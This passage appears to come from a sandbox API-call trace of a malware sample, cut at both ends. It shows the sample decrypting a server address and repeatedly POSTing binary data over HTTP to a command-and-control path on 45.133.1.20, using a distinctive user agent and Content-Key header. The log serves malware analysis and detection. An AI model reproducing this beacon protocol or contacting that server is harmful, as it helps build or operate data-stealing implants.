| out: hHeap=0x6a0000) returned 1 [0199.785] GetProcessHeap () returned 0x6a0000 [0199.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.785] GetProcessHeap () returned 0x6a0000 [0199.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0199.786] GetProcessHeap () returned 0x6a0000 [0199.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0199.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.787] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.794] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0199.802] GetProcessHeap () returned 0x6a0000 [0199.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0199.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.803] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0199.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.805] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.806] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.806] GetProcessHeap () returned 0x6a0000 [0199.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0199.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.808] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0199.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.809] CryptDestroyKey (hKey=0x6ad020) returned 1 [0199.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.810] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0199.810] GetProcessHeap () returned 0x6a0000 [0199.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0199.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.812] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0199.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.813] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0199.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.814] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0199.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.815] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0199.815] GetProcessHeap () returned 0x6a0000 [0199.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0199.816] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0199.816] GetProcessHeap () returned 0x6a0000 [0199.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0199.816] socket (af=2, type=1, protocol=6) returned 0x528 [0199.816] connect (s=0x528, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0199.845] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0199.845] GetProcessHeap () returned 0x6a0000 [0199.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0199.845] GetProcessHeap () returned 0x6a0000 [0199.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0199.845] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0199.846] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.846] GetProcessHeap () returned 0x6a0000 [0199.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0199.846] GetProcessHeap () returned 0x6a0000 [0199.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0199.847] GetProcessHeap () returned 0x6a0000 [0199.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0199.847] GetProcessHeap () returned 0x6a0000 [0199.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0199.848] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0199.848] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.849] GetProcessHeap () returned 0x6a0000 [0199.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0199.849] GetProcessHeap () returned 0x6a0000 [0199.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0199.849] send (s=0x528, buf=0x6b5c98*, len=242, flags=0) returned 242 [0199.850] send (s=0x528, buf=0x6bb998*, len=159, flags=0) returned 159 [0199.850] GetProcessHeap () returned 0x6a0000 [0199.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0199.850] recv (in: s=0x528, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0199.929] GetProcessHeap () returned 0x6a0000 [0199.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0199.930] GetProcessHeap () returned 0x6a0000 [0199.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0199.930] GetProcessHeap () returned 0x6a0000 [0199.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0199.931] GetProcessHeap () returned 0x6a0000 [0199.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0199.931] closesocket (s=0x528) returned 0 [0199.932] GetProcessHeap () returned 0x6a0000 [0199.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0199.932] GetProcessHeap () returned 0x6a0000 [0199.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.933] GetProcessHeap () returned 0x6a0000 [0199.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0199.933] GetProcessHeap () returned 0x6a0000 [0199.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0199.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x51c) returned 0x528 [0199.935] Sleep (dwMilliseconds=0xea60) [0199.937] GetProcessHeap () returned 0x6a0000 [0199.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0199.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.938] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.951] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0199.964] GetProcessHeap () returned 0x6a0000 [0199.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5d78 [0199.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.966] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c5d78, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0199.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.967] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.969] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.969] GetProcessHeap () returned 0x6a0000 [0199.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5d78 | out: hHeap=0x6a0000) returned 1 [0199.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.971] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0199.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.995] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0199.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.997] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0199.997] GetProcessHeap () returned 0x6a0000 [0199.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0200.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.001] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.002] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.003] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.046] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.046] GetProcessHeap () returned 0x6a0000 [0200.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0200.046] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.047] GetProcessHeap () returned 0x6a0000 [0200.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0200.047] GetProcessHeap () returned 0x6a0000 [0200.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0200.048] GetProcessHeap () returned 0x6a0000 [0200.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0200.048] GetProcessHeap () returned 0x6a0000 [0200.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0200.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.050] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.056] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0200.069] GetProcessHeap () returned 0x6a0000 [0200.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0200.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.071] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0200.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.073] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.077] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.077] GetProcessHeap () returned 0x6a0000 [0200.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0200.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.079] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0200.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.080] CryptDestroyKey (hKey=0x6ad020) returned 1 [0200.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.082] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0200.082] GetProcessHeap () returned 0x6a0000 [0200.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0200.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.083] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0200.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.084] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0200.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.086] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0200.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.088] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0200.088] GetProcessHeap () returned 0x6a0000 [0200.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0200.089] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0200.089] GetProcessHeap () returned 0x6a0000 [0200.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0200.089] socket (af=2, type=1, protocol=6) returned 0x52c [0200.089] connect (s=0x52c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0200.118] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0200.118] GetProcessHeap () returned 0x6a0000 [0200.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0200.118] GetProcessHeap () returned 0x6a0000 [0200.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0200.119] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0200.120] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.120] GetProcessHeap () returned 0x6a0000 [0200.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0200.120] GetProcessHeap () returned 0x6a0000 [0200.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0200.121] GetProcessHeap () returned 0x6a0000 [0200.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0200.121] GetProcessHeap () returned 0x6a0000 [0200.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0200.123] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0200.124] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.125] GetProcessHeap () returned 0x6a0000 [0200.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0200.125] GetProcessHeap () returned 0x6a0000 [0200.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0200.125] send (s=0x52c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0200.126] send (s=0x52c, buf=0x6bb998*, len=159, flags=0) returned 159 [0200.126] GetProcessHeap () returned 0x6a0000 [0200.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0200.126] recv (in: s=0x52c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0200.197] GetProcessHeap () returned 0x6a0000 [0200.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0200.200] GetProcessHeap () returned 0x6a0000 [0200.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0200.200] GetProcessHeap () returned 0x6a0000 [0200.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0200.201] GetProcessHeap () returned 0x6a0000 [0200.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0200.201] closesocket (s=0x52c) returned 0 [0200.202] GetProcessHeap () returned 0x6a0000 [0200.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0200.202] GetProcessHeap () returned 0x6a0000 [0200.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0200.203] GetProcessHeap () returned 0x6a0000 [0200.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0200.203] GetProcessHeap () returned 0x6a0000 [0200.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0200.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xdb0) returned 0x52c [0200.207] Sleep (dwMilliseconds=0xea60) [0200.208] GetProcessHeap () returned 0x6a0000 [0200.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0200.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.211] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.219] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0200.226] GetProcessHeap () returned 0x6a0000 [0200.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0200.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.228] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0200.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.230] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.238] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.238] GetProcessHeap () returned 0x6a0000 [0200.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0200.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.240] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0200.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.241] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0200.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.245] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0200.245] GetProcessHeap () returned 0x6a0000 [0200.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0200.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.246] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.247] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.248] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.249] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.249] GetProcessHeap () returned 0x6a0000 [0200.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0200.249] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.249] GetProcessHeap () returned 0x6a0000 [0200.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0200.250] GetProcessHeap () returned 0x6a0000 [0200.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0200.250] GetProcessHeap () returned 0x6a0000 [0200.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0200.250] GetProcessHeap () returned 0x6a0000 [0200.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0200.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.253] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.263] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 